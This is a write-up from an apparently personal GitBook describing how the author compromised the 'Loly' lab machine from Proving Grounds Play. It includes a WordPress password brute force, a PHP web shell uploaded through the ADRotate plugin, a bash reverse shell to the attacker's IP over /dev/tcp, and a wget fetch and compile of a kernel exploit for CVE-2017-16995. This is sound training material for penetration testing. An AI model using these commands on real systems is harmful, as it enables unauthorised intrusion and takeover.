M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Introduction
  • Reconnaissance
  • Enumeration
  • Port 80
  • Explotation
  • WordPress Brute-Force Attack
  • Identifying a File Upload Mechanism
  • TTY Treatment
  • Privilege Escalation
  • Lateral Movement - Escalating to User "loly"
  • Kernel Exploitation - Escalating to Root
  1. WRITEUPS
  2. Proving Grounds Play

Loly

Introduction

This write-up details the steps taken to solve the Loly machine from Proving Grounds Play. The approach includes reconnaissance, enumeration, exploitation, and privilege escalation to gain root access.

Reconnaissance

I began with a full port scan using nmap to identify services and their versions:

nmap -sCV -p- 192.168.207.121
┌──(venv)─(kali㉿kali)-[~/provingGrounds/Loly]
└─$ sudo nmap -sSCV -n -T4 -p- 192.168.207.121
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 04:19 EST
Nmap scan report for 192.168.207.121
Host is up (0.034s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.27 seconds

Enumeration

Port 80

Upon visiting http://192.168.207.121/, the default nginx welcome page was displayed.

Since no obvious entry points were available, directory enumeration was performed using gobuster:

gobuster dir -b 403,404 -u "http://192.168.207.121/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 --no-error

A directory named /wordpress was discovered, indicating the presence of a WordPress CMS.

Host Modification for Proper Resolution

Upon clicking Login, the page redirected to loly.lc/wp-admin/wp-login.php. This indicated that the application uses a virtual host configuration. To properly interact with WordPress, the hostname was added to `/etc/hosts.

Now, accessing http://loly.lc/wordpress/ correctly displayed the WordPress site:

WordPress Enumeration

To extract more information, wpscan was used to enumerate users, themes, and plugins:

wpscan --url http://192.168.207.121/wordpress/ --enumerate u,t,p

Findings:

  • Identified Themes:

    • twentynineteen (1.7)

    • twentyseventeen (2.4)

    • twentytwenty (1.5)

    • virtue (3.4.2)

    None of these themes had known public vulnerabilities, so theme-based exploitation was ruled out.

  • Identified Users:

    • A user named loly was found.

    Given that password brute-forcing is a common attack vector on WordPress instances, this user can be targeted using credential stuffing or brute-force attacks.

Explotation

WordPress Brute-Force Attack

With the username loly identified, a brute-force attack was conducted using wpscan to determine the valid password:

wpscan --url http://192.168.207.121/wordpress/ -U loly -P /usr/share/wordlists/rockyou.txt

The scan revealed loly's password:

  • Username: loly

  • Password: fernando

With these credentials, I successfully authenticated to the WordPress admin panel at: http://loly.lc/wordpress/wp-admin/

Identifying a File Upload Mechanism

During the post-login analysis, I found that the ADRotate plugin was installed. This plugin provides an ad banner management system and includes functionality to upload ZIP archives, which are automatically extracted.

This behavior can be exploited by uploading a ZIP file containing a malicious PHP shell and accessing it remotely to execute system commands.

A simple web shell was created to execute arbitrary commands via the cmd parameter:

<?php echo system($_GET['cmd']); ?>

The script was then compressed into a ZIP archive to bypass file upload restrictions:

The ZIP file was successfully uploaded using ADRotate, and the contents were extracted to the wp-content/banners/ directory.

By navigating to: http://loly.lc/wordpress/wp-content/banners/shell.php?cmd=id, I confirmed remote command execution:

To obtain an interactive shell, I triggered a reverse shell payload:

https://loly.lc/wordpress/wp-content/banners/rce.php?cmd=bash+-c+%27exec+bash+-i+%26%3E/dev/tcp/192.168.45.191/4444+%3C%261%27

Before executing the payload, a Netcat listener was set up on the attack machine. Once the payload was executed, a reverse shell was successfully established:

TTY Treatment

Once I had successfully established the reverse shell, the session was not as stable or user-friendly as it could be. The shell I obtained was non-interactive, meaning it didn’t allow me to perform typical interactive tasks like tab completion, command history, or using commands like sudo properly.

To resolve this, I applied a TTY treatment to the shell, making it more stable and interactive. This was done by upgrading the shell to a fully interactive terminal using the following command:

script /dev/null -c bash
CTRL + z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 53 columns 236

After checking the contents of the /var/www directory, I discovered the user flag.

Privilege Escalation

After obtaining an initial shell, the goal is to escalate privileges to root. This process involves:

  • Lateral movement to a more privileged user.

  • Kernel exploitation to achieve full system control.

Lateral Movement - Escalating to User "loly"

Checking Running Services

Since MySQL configurations often store plaintext credentials, I searched for the WordPress configuration file, which usually contains database connection details.

Using these credentials, I logged into the MySQL database:

Credential Reuse for System Access

Although MySQL did not contain useful information, I attempted to reuse the password for system authentication. Upon entering "lolyisabeautifulgirl", I successfully switched to the loly user:

Kernel Exploitation - Escalating to Root

Running LinPEAS to enumerate privilege escalation vectors, I identified that the system was running a vulnerable Linux kernel version, exploitable via CVE-2017-16995.

On Attacker Machine:

Download the exploit from Exploit-DB and start an HTTP server to transfer it:

searchsploit -m 45010
python3 -m http.server

On Victim Machine:

Download the exploit using wget:

wget http://192.168.45.191/45010.c

Once transferred, the exploit was compiled using gcc:

gcc 45010.c -o shell
chmod +x shell

Running the compiled exploit successfully elevated privileges to root:

PreviousMonitoringNextPelican

Last updated 4 months ago

Navigating to /var/www/html/wordpress/wp-config.php, I found hardcoded database credentials:

Exploit reference:

Exploit-DB #45010